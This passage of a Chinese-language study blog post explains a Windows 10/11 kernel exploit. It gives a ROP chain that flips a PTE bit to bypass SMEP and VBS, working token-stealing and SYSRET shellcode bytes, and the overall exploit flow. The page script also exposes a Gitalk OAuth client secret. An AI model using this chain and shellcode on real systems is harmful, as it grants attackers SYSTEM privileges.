buffer[i++] =               <span class="number">0x000008</span>; <span class="comment">// Set RDX to 0x08, we will need this to accomplish the XOR</span></span><br><span class="line"> buffer[i++] =               <span class="number">0x000000</span>; <span class="comment">// [filler]</span></span><br><span class="line"> buffer[i++] =               <span class="number">0x000000</span>; <span class="comment">// [filler]</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">/* Setup the call to MiGetPteAddress in order to get the address of the PTE for our</span></span><br><span class="line"><span class="comment">    userland code. The setup is as follows:</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment">      RAX -&gt; VOID *MiGetPteAddress(</span></span><br><span class="line"><span class="comment">        ( RCX == PTE / Userland Code )</span></span><br><span class="line"><span class="comment">      );</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">    Once the call is complete RAX should contain the pointer to our PTE. */</span></span><br><span class="line"> buffer[i++] = kernel_base + <span class="number">0xa74d93</span>; <span class="comment">// pop rcx ; ret     [nt]</span></span><br><span class="line"> buffer[i++] = (<span class="type">int64_t</span>)shellcode;     <span class="comment">// *shellcode        [nt]</span></span><br><span class="line"> buffer[i++] = kernel_base + <span class="number">0x26b560</span>; <span class="comment">// MiGetPteAddress() [nt]</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">/* Now that we have obtained the PTE address, we can modify the 2nd bit in order to</span></span><br><span class="line"><span class="comment">    mark the page as a kernel page (U -&gt; K). We can do this using XOR ;) */</span></span><br><span class="line"> buffer[i++] = kernel_base + <span class="number">0x2ffbfb</span>; <span class="comment">// sub rax, rdx ; ret                [nt]</span></span><br><span class="line"> buffer[i++] = kernel_base + <span class="number">0xa6f2f5</span>; <span class="comment">// push rax ; pop rbx ; ret          [nt]</span></span><br><span class="line"> buffer[i++] = kernel_base + <span class="number">0x3f99ce</span>; <span class="comment">// pop rdx ; pop rax ; pop rcx ; ret [nt]</span></span><br><span class="line"> buffer[i++] =               <span class="number">0x000004</span>; <span class="comment">// When we XOR the PTE by 0x4 we flip the 2nd bit (U -&gt; K)</span></span><br><span class="line"> buffer[i++] =               <span class="number">0x000000</span>; <span class="comment">// [filler]</span></span><br><span class="line"> buffer[i++] =               <span class="number">0x000000</span>; <span class="comment">// [filler]</span></span><br><span class="line"> buffer[i++] = kernel_base + <span class="number">0x2107b2</span>; <span class="comment">// xor  [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret [nt]</span></span><br></pre></td></tr></table></figure></div>

<p>这段ROP链的目的是修改页表条目(PTE)的权限位，将用户空间的内存页标记为内核空间页，从而绕过内存保护机制。下面逐步解释每个部分的作用：</p>
<h2 id="1-初始化RDX寄存器"><a href="#1-初始化RDX寄存器" class="headerlink" title="1. 初始化RDX寄存器"></a>1. 初始化RDX寄存器</h2><p>asm</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret</span><br><span class="line">buffer[i++] = 0x000008; // 设置RDX为0x08</span><br><span class="line">buffer[i++] = 0x000000; // 填充RAX</span><br><span class="line">buffer[i++] = 0x000000; // 填充RCX</span><br></pre></td></tr></table></figure></div>

<p>这部分通过ROP gadget将RDX寄存器设置为0x08，这个值后面会用于地址计算。</p>
<h2 id="2-获取PTE地址"><a href="#2-获取PTE地址" class="headerlink" title="2. 获取PTE地址"></a>2. 获取PTE地址</h2><p>asm</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">buffer[i++] = kernel_base + 0xa74d93; // pop rcx ; ret</span><br><span class="line">buffer[i++] = (int64_t)shellcode;     // shellcode地址</span><br><span class="line">buffer[i++] = kernel_base + 0x26b560; // MiGetPteAddress()</span><br></pre></td></tr></table></figure></div>

<p>这部分:</p>
<ol>
<li>首先将shellcode的地址放入RCX寄存器</li>
<li>然后调用<code>MiGetPteAddress</code>内核函数，该函数接收一个虚拟地址(在RCX中)，返回对应的PTE地址到RAX</li>
</ol>
<h2 id="3-修改PTE权限位"><a href="#3-修改PTE权限位" class="headerlink" title="3. 修改PTE权限位"></a>3. 修改PTE权限位</h2><p>asm</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">buffer[i++] = kernel_base + 0x2ffbfb; // sub rax, rdx ; ret</span><br><span class="line">buffer[i++] = kernel_base + 0xa6f2f5; // push rax ; pop rbx ; ret</span><br><span class="line">buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret</span><br><span class="line">buffer[i++] = 0x000004; // 设置RDX为0x04</span><br><span class="line">buffer[i++] = 0x000000; // 填充RAX</span><br><span class="line">buffer[i++] = 0x000000; // 填充RCX</span><br><span class="line">buffer[i++] = kernel_base + 0x2107b2; // xor [rbx+0x08], edx ; ...</span><br></pre></td></tr></table></figure></div>

<p>这部分是核心操作:</p>
<ol>
<li>首先将RAX(PTE地址)减去RDX(0x08)，得到PTE结构中的特定字段地址</li>
<li>将调整后的地址存入RBX</li>
<li>重新设置RDX为0x04，这个值用于XOR操作</li>
<li>执行<code>xor [rbx+0x08], edx</code>，这会翻转PTE中的第二位(用户&#x2F;内核位)</li>
</ol>
<p>通过这种操作，攻击者将用户空间的shellcode页面标记为内核页面，从而绕过用户空间代码不能在内核模式执行的安全限制。</p>
<h1 id="3-shellcode解析："><a href="#3-shellcode解析：" class="headerlink" title="3.shellcode解析："></a>3.shellcode解析：</h1><div class="code-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> shellcode[] =</span><br><span class="line">    <span class="comment">// python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint</span></span><br><span class="line">    <span class="string">&quot;\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00&quot;</span> <span class="comment">// movabs rax, qword ptr gs:[0x188] </span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\x80\xb8\x00\x00\x00&quot;</span>                 <span class="comment">// mov rax, qword ptr [rax + 0xb8] </span></span><br><span class="line">    <span class="string">&quot;\x48\x89\xc1&quot;</span>                                 <span class="comment">// mov rcx, rax</span></span><br><span class="line">    <span class="string">&quot;\xb2\x04&quot;</span>                                     <span class="comment">// mov dl, 4</span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\x80\x48\x04\x00\x00&quot;</span>                 <span class="comment">// mov rax, qword ptr [rax + 0x448] </span></span><br><span class="line">    <span class="string">&quot;\x48\x2d\x48\x04\x00\x00&quot;</span>                     <span class="comment">// sub rax, 0x448 </span></span><br><span class="line">    <span class="string">&quot;\x38\x90\x40\x04\x00\x00&quot;</span>                     <span class="comment">// cmp byte ptr [rax + 0x440], dl</span></span><br><span class="line">    <span class="string">&quot;\x75\xeb&quot;</span>                                     <span class="comment">// jne 0x1017 </span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\x90\xb8\x04\x00\x00&quot;</span>                 <span class="comment">// mov rdx, qword ptr [rax + 0x4b8] </span></span><br><span class="line">    <span class="string">&quot;\x48\x89\x91\xb8\x04\x00\x00&quot;</span>                 <span class="comment">// mov qword ptr [rcx + 0x4b8], rdx </span></span><br><span class="line"> </span><br><span class="line">    <span class="comment">// python3 sickle.py -p windows/x64/kernel_sysret -f c -m pinpoint</span></span><br><span class="line">    <span class="string">&quot;\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00&quot;</span> <span class="comment">// movabs rax, qword ptr gs:[0x188]</span></span><br><span class="line">    <span class="string">&quot;\x66\x8b\x88\xe4\x01\x00\x00&quot;</span>                 <span class="comment">// mov cx, word ptr [rax + 0x1e4] </span></span><br><span class="line">    <span class="string">&quot;\x66\xff\xc1&quot;</span>                                 <span class="comment">// inc cx</span></span><br><span class="line">    <span class="string">&quot;\x66\x89\x88\xe4\x01\x00\x00&quot;</span>                 <span class="comment">// mov word ptr [rax + 0x1e4], cx</span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\x90\x90\x00\x00\x00&quot;</span>                 <span class="comment">// mov rdx, qword ptr [rax + 0x90]</span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\x8a\x68\x01\x00\x00&quot;</span>                 <span class="comment">// mov rcx, qword ptr [rdx + 0x168]</span></span><br><span class="line">    <span class="string">&quot;\x4c\x8b\x9a\x78\x01\x00\x00&quot;</span>                 <span class="comment">// mov r11, qword ptr [rdx + 0x178]</span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\xa2\x80\x01\x00\x00&quot;</span>                 <span class="comment">// mov rsp, qword ptr [rdx + 0x180]</span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\xaa\x58\x01\x00\x00&quot;</span>                 <span class="comment">// mov rbp, qword ptr [rdx + 0x158]</span></span><br><span class="line">    <span class="string">&quot;\x31\xc0&quot;</span>                                     <span class="comment">// xor eax, eax</span></span><br><span class="line">    <span class="string">&quot;\x0f\x01\xf8&quot;</span>                                 <span class="comment">// swapgs </span></span><br><span class="line">    <span class="string">&quot;\x48\x0f\x07&quot;</span>;                                <span class="comment">// sysretq</span></span><br></pre></td></tr></table></figure></div>

<p>这段 shellcode 由两部分组成：</p>
<ol>
<li><strong>Token Stealing（令牌窃取）</strong> - 提权到 SYSTEM 权限</li>
<li><strong>Kernel to User Return（内核返用户态）</strong> - 安全返回用户模式</li>
</ol>
<p>1.对于Token Stealing（令牌窃取），整体思路同windows7中的oob中的思路，不同的是偏移量</p>
<p>2.对于Kernel to User Return（内核返用户态）。通常情况下，最好是手动恢复执行流程。不过，我决定使用 Kristal-G 的 SYSRET shellcode，这是一种允许从内核返回的通用技术。据我所知，这是首个此类技术（Linux 变种除外）。可以使用 Sickle 生成 Kristal-G 的 shellcode，如下所示：</p>
<h1 id="EXP的流程："><a href="#EXP的流程：" class="headerlink" title="EXP的流程："></a>EXP的流程：</h1><p>1.GetKernelBaseAddress函数获取nt模块的首地址（绕过KASLR）。因为构造ROP链需要nt模块的基地址</p>
<p>2.用在buffer中构造ROP链实现修改shellcode所在页的页表权限（绕过SMEP和VBS）（修改返回地址为ROP链的基地址）</p>
<p>3.写x64对应的token stealing功能的shellcode的地址写在跟在ROP链后面（注：此处连续写了0xc个shellcode地址，通过连续写入多个shellcode地址，增加了”命中”正确返回位置的概率，即使栈帧计算有少量偏差，只要跳转到这些地址中的任何一个都能执行shellcode）</p>
<p>4.返回用户模式</p>
<p>参考链接：<a class="link" target="_blank" rel="noopener" href="https://wetw0rk.github.io/posts/0x01-killing-windows-kernel-mitigations/">https://wetw0rk.github.io/posts/0x01-killing-windows-kernel-mitigations/<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p>

		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 绕过windows10/11的保护机制</li>
        <li><strong>Author:</strong> zhaojunqi</li>
        <li><strong>Created at
                :</strong> 2025-10-10 17:28:13</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2025-10-17 17:31:11
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2025/10/10/绕过windows10-11的保护机制/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Windows%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E8%B0%83%E8%AF%95%E5%AD%A6%E4%B9%A0/">#Windows内核漏洞调试学习</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2025/06/28/Chrome%E4%BF%A1%E6%81%AF%E6%9F%A5%E8%AF%A2/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">Chrome信息查询</span>
						<span class="post-nav-item">Next posts</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="gitalk-container"></div>
    <script data-swup-reload-script
            src="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.8.0/gitalk.min.js"></script>
    <script data-swup-reload-script>

        function loadGitalk() {
            let __gitalk__pathname = decodeURI(location.pathname);
            const __gitalk__pathnameLength = __gitalk__pathname.length;
            const __gitalk__pathnameMaxLength = 50;
            if (__gitalk__pathnameLength > __gitalk__pathnameMaxLength) {
                __gitalk__pathname = __gitalk__pathname.substring(0, __gitalk__pathnameMaxLength - 3) + '...';
            }

            try {
                Gitalk && new Gitalk({
                    clientID: 'Ov23lidjSBIaU7fzObjo',
                    clientSecret: 'c62972e9ed487a2658ee2511296a3a886f291df4',
                    repo: 'gitalk',
                    owner: 'aklnjakln',
                    admin: ['aklnjakln'],
                    id: __gitalk__pathname,
                    language: 'en',
                    proxy: 'https://github.com/login/oauth/access_token'
                }).render('gitalk-container');

            } catch (e) {
                window.Gitalk = null;
            }
        }

        if ('true') {
            const loadGitalkTimeout = setTimeout(() => {
                loadGitalk();
                clearTimeout(loadGitalkTimeout);
            }, 1000);
        } else {
            window.addEventListener('DOMContentLoaded', loadGitalk);
        }
    </script>



        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">绕过windows10/11的保护机制</div>
		<ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BB%95%E8%BF%87Windows10-11%E7%9A%84%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6%EF%BC%88KASLR%EF%BC%8CSMEP%EF%BC%8CVBS%EF%BC%89"><span class="nav-text">绕过Windows10&#x2F;11的保护机制（KASLR，SMEP，VBS）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%94%99%E8%AF%AF%E5%B0%9D%E8%AF%95%E2%80%94%E2%80%94%E4%BF%AE%E6%94%B9CR4%E5%AF%84%E5%AD%98%E5%99%A8%E7%9A%84%E7%AC%AC20%E4%BD%8D%EF%BC%9A"><span class="nav-text">错误尝试——修改CR4寄存器的第20位：</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#1-%E8%8E%B7%E5%8F%96nt%E6%A8%A1%E5%9D%97%E7%9A%84%E8%B5%B7%E5%A7%8B%E5%9C%B0%E5%9D%80%EF%BC%88%E7%BB%95%E8%BF%87KASLR%EF%BC%89%EF%BC%9A"><span class="nav-text">1.获取nt模块的起始地址（绕过KASLR）：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%87%BD%E6%95%B0EnumDeviceDrivers"><span class="nav-text">1.函数EnumDeviceDrivers</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%8F%82%E6%95%B0%E8%AF%B4%E6%98%8E"><span class="nav-text">2.参数说明</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E8%BF%94%E5%9B%9E%E5%80%BC"><span class="nav-text">3.返回值</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E5%87%BD%E6%95%B0%E5%8A%9F%E8%83%BD"><span class="nav-text">4.函数功能</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B0%E7%9A%84%E6%96%B9%E5%BC%8F%E7%BB%95%E8%BF%87SMEP%EF%BC%9A"><span class="nav-text">新的方式绕过SMEP：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-%E7%94%A8ROP%E9%93%BE%E5%AE%9E%E7%8E%B0%E4%BF%AE%E6%94%B9shellcode%E6%89%80%E5%9C%A8%E9%A1%B5%E7%9A%84%E6%9D%83%E9%99%90%E4%BF%A1%E6%81%AF%EF%BC%88%E7%BB%95%E8%BF%87SMEP%E5%92%8CVBS%EF%BC%89%EF%BC%9A"><span class="nav-text">2.用ROP链实现修改shellcode所在页的权限信息（绕过SMEP和VBS）：</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E5%88%9D%E5%A7%8B%E5%8C%96RDX%E5%AF%84%E5%AD%98%E5%99%A8"><span class="nav-text">1. 初始化RDX寄存器</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E8%8E%B7%E5%8F%96PTE%E5%9C%B0%E5%9D%80"><span class="nav-text">2. 获取PTE地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E4%BF%AE%E6%94%B9PTE%E6%9D%83%E9%99%90%E4%BD%8D"><span class="nav-text">3. 修改PTE权限位</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-shellcode%E8%A7%A3%E6%9E%90%EF%BC%9A"><span class="nav-text">3.shellcode解析：</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#EXP%E7%9A%84%E6%B5%81%E7%A8%8B%EF%BC%9A"><span class="nav-text">EXP的流程：</span></a></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">zhaojunqi</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        14 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.2</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>





    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>




    
<script src="/js/build/tools/runtime.js"></script>

    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>